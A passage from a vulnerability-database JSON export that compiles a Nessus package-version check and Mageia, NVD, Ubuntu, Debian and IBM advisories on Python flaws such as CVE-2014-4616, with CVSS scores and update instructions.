(credentials,\n cookies, etc. that are cached against a given\n hostname). The components are: urllib.parse.urlsplit,\n urllib.parse.urlparse. The attack vector is: A\n specially crafted URL could be incorrectly parsed to\n locate cookies or authentication data and send that\n information to a different host than when parsed\n correctly.(CVE-2019-9636)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1434\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?776f9511\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected python packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"python-2.7.5-69.h19\",\n \"python-devel-2.7.5-69.h19\",\n \"python-libs-2.7.5-69.h19\",\n \"python-tools-2.7.5-69.h19\",\n \"tkinter-2.7.5-69.h19\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Python 2 and 3 are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. The bug is caused by allowing the user to supply a negative value that is used an an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616). This issue also affected the python-simplejson package, which has been patched to fix the bug. \n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2014-07-08T22:38:10", "type": "mageia", "title": "Updated python-simplejson package fixes security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2014-07-08T22:38:10", "id": "MGASA-2014-0286", "href": "https://advisories.mageia.org/MGASA-2014-0286.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated python and python3 packages fix security vulnerabilities: Python 2 and 3 are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. The bug is caused by allowing the user to supply a negative value that is used an an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616). The CGIHTTPServer Python module does not properly handle URL-encoded path separators in URLs. This may enable attackers to disclose a CGI script's source code or execute arbitrary scripts in the server's document root (CVE-2014-4650). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-07-08T22:35:18", "type": "mageia", "title": "Updated python & python3 packages fix two vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-07-08T22:35:18", "id": "MGASA-2014-0285", "href": "https://advisories.mageia.org/MGASA-2014-0285.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T13:19:35", "description": "Array index error in the scanstring function in the _json module in Python 2.7 through 3.5 and simplejson before 2.6.1 allows context-dependent attackers to read arbitrary process memory via a negative index value in the idx argument to the raw_decode function.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-08-24T20:29:00", "type": "cve", "title": "CVE-2014-4616", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:python:python:3.1.4", "cpe:/a:python:python:3.2.2", "cpe:/a:python:python:2.7.11", "cpe:/a:python:python:3.1.1", "cpe:/a:python:python:2.7.0", "cpe:/a:python:python:2.7.4", "cpe:/a:python:python:3.1.5", "cpe:/a:python:python:3.3.1", "cpe:/a:python:python:3.3.4", "cpe:/a:python:python:3.4.6", "cpe:/a:python:python:2.7.6", "cpe:/a:python:python:3.3.6", "cpe:/a:python:python:2.7.1", "cpe:/a:python:python:3.2.5", "cpe:/a:python:python:3.2.6", "cpe:/a:python:python:3.5.0", "cpe:/a:python:python:3.1.2", "cpe:/a:python:python:3.4.3", "cpe:/a:python:python:2.7.12", "cpe:/a:python:python:3.2.1", "cpe:/a:python:python:2.7.13", "cpe:/a:python:python:3.1.3", "cpe:/a:python:python:3.3.5", "cpe:/a:python:python:3.1.0", "cpe:/a:python:python:2.7.8", "cpe:/a:python:python:3.2.0", "cpe:/a:python:python:3.4.5", "cpe:/a:python:python:2.7.3", "cpe:/a:python:python:3.4.1", "cpe:/a:python:python:3.3.0", "cpe:/a:python:python:3.3.2", "cpe:/a:python:python:3.2.4", "cpe:/a:python:python:2.7.2", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:python:python:3.4.4", "cpe:/a:python:python:3.2.3", "cpe:/a:python:python:2.7.7", "cpe:/a:python:python:3.4.0", "cpe:/a:python:python:3.0.0", "cpe:/a:python:python:2.7.5", "cpe:/a:python:python:3.4.7", "cpe:/o:opensuse_project:opensuse:12.3", "cpe:/a:python:python:3.3.3", "cpe:/a:python:python:2.7.10", "cpe:/a:python:python:2.7.9", "cpe:/a:python:python:3.4.2", "cpe:/a:python:python:3.0.1"], "id": "CVE-2014-4616", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4616", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:python:python:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.10:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse_project:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.11:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.13:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.12:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.2:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2021-11-22T21:51:34", "description": "Array index error in the scanstring function in the _json module in Python\n2.7 through 3.5 and simplejson before 2.6.1 allows context-dependent\nattackers to read arbitrary process memory via a negative index value in\nthe idx argument to the raw_decode function.\n\n#### Bugs\n\n * <http://bugs.python.org/issue21529>\n * <https://bugs.launchpad.net/ubuntu/+source/python3.4/+bug/1333396>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=1112285>\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2014-06-26T00:00:00", "type": "ubuntucve", "title": "CVE-2014-4616", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2014-06-26T00:00:00", "id": "UB:CVE-2014-4616", "href": "https://ubuntu.com/security/CVE-2014-4616", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "debiancve": [{"lastseen": "2022-04-03T07:41:15", "description": "Array index error in the scanstring function in the _json module in Python 2.7 through 3.5 and simplejson before 2.6.1 allows context-dependent attackers to read arbitrary process memory via a negative index value in the idx argument to the raw_decode function.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-08-24T20:29:00", "type": "debiancve", "title": "CVE-2014-4616", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2017-08-24T20:29:00", "id": "DEBIANCVE:CVE-2014-4616", "href": "https://security-tracker.debian.org/tracker/CVE-2014-4616", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "ibm": [{"lastseen": "2021-12-30T21:42:51", "description": "## Summary\n\nSecurity Bulletin: A security vulnerability has been identified in the version of Python shipped with the IBM Resilient virtual appliance (CVE-2017-1000158, CVE-2014-4616)\n\n## Vulnerability Details\n\n**Title**\n\nA security vulnerability has been identified in the version of Python shipped with the IBM Resilient virtual appliance (CVE-2017-1000158, CVE-2014-4616)\n\n**Summary**\n\nA vulnerable version of Python is shipped as a component of the IBM Resilient virtual appliance. Information about this security vulnerability can be seen below.\n\n**Vulnerability Details**\n\nCVEID: [CVE-2014-4616](<https://www.cvedetails.com/cve/CVE-2014-4616/>)\n\nCVEID: [\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n](<htt</p>\n </div>\n\n \n \n \n \n <div class=>)\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSIP9Q\",\"label\":\"IBM Security SOAR\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-04-19T21:33:34", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in the version of Python shipped with the IBM Resilient virtual appliance (CVE-2017-1000158, CVE-2014-4616)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616", "CVE-2017-1000158"], "modified": "2021-04-19T21:33:34", "id": "6599DC93FFCF552D50A8FC9F31B71D111EC8AFA95F2B494C03ED7610CB908101", "href": "https://www.ibm.com/support/pages/node/1162768", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-30T21:41:41", "description": "## Summary\n\nPowerKVM is affected by several vulnerabilities in Python. These vulnerabilities are now fixed.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2013-1752_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1752>)** \nDESCRIPTION:** Python SSL module is vulnerable to denial of service, caused by an unlimited readline() function call. A remote attacker could exploit this vulnerability to exhaust all available memory resources. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90056_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90056>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n**CVEID:** [_CVE-2014-7185_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7185>)** \nDESCRIPTION:** Python could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow in bufferobject.c. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96193_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96193>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [_CVE-2013-1753_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1753>)** \nDESCRIPTION:** Python is vulnerable to a denial of service, caused by the failure to restrict the size of a gzip compressed HTTP responses by the xmlrpc library. By connecting to a malicious server, an attacker could exploit this vulnerability to consume an overly large amount of memory resources. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111150_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111150>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L)\n\n**CVEID:** [_CVE-2014-4616_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4616>)** \nDESCRIPTION:** Python JSON module could allow a local attacker to obtain sensitive information, caused by the failure to properly handle negative index values and allowing them to be used directly as an index to an array in the C code. An attacker could exploit this vulnerability to read current process memory and obtain sensitive information. \nCVSS Base Score: 2.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/93933_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93933>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [_CVE-2014-4650_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650>)** \nDESCRIPTION:** Python CGIHTTPServer module could allow a remote attacker to obtain sensitive information, caused by the failure to properly handle URL-encoded path separators in URLs. An attacker could exploit this vulnerability to obtain the source code of CGI scripts. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/93932_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93932>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nPowerKVM 2.1 and PowerKVM 3.1\n\n## Remediation/Fixes\n\nCustomers can update PowerKVM systems by using \"yum update\". \n \nFix images are made available via Fix Central. For version 3.1, see [_https://ibm.biz/BdHggw_](<https://ibm.biz/BdHggw>) for 3.1.0 service pack 1 (SP1) or later. \n \nFor version 2.1, the fix is made available via Fix Central ([_https://ibm.biz/BdEnT8_](<https://ibm.biz/BdEnT8>)) in 2.1.1 Build 65.7 and all later 2.1.1 SP3 service builds and 2.1.1 service packs. Customers running v2.1 are, in any case, encouraged to upgrade to v3.1. \n \nFor v2.1 systems currently running fix levels of PowerKVM prior to 2.1.1, please see <http://download4.boulder.ibm.com/sar/CMA/OSA/05e4c/0/README> for prerequisite fixes and instructions.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n4 March 2016 - Initial Version\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSZJY4\",\"label\":\"PowerKVM\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.1;3.1\",\"Edition\":\"KVM\",\"Line of Business\":{\"code\":\"LOB08\",\"label\":\"Cognitive Systems\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-06-18T01:30:44", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Python affect PowerKVM", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "modified": "2018-06-18T01:30:44", "id": "A8F9E1B81DC06E155AA3018909D00AA443F0B83C885BE667CD9EB051536E7A27", "href": "https://www.ibm.com/support/pages/node/628405", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:56", "description": "_json information leak, CGIHTTPServer unauthroized files access and code execution, lz4 integer 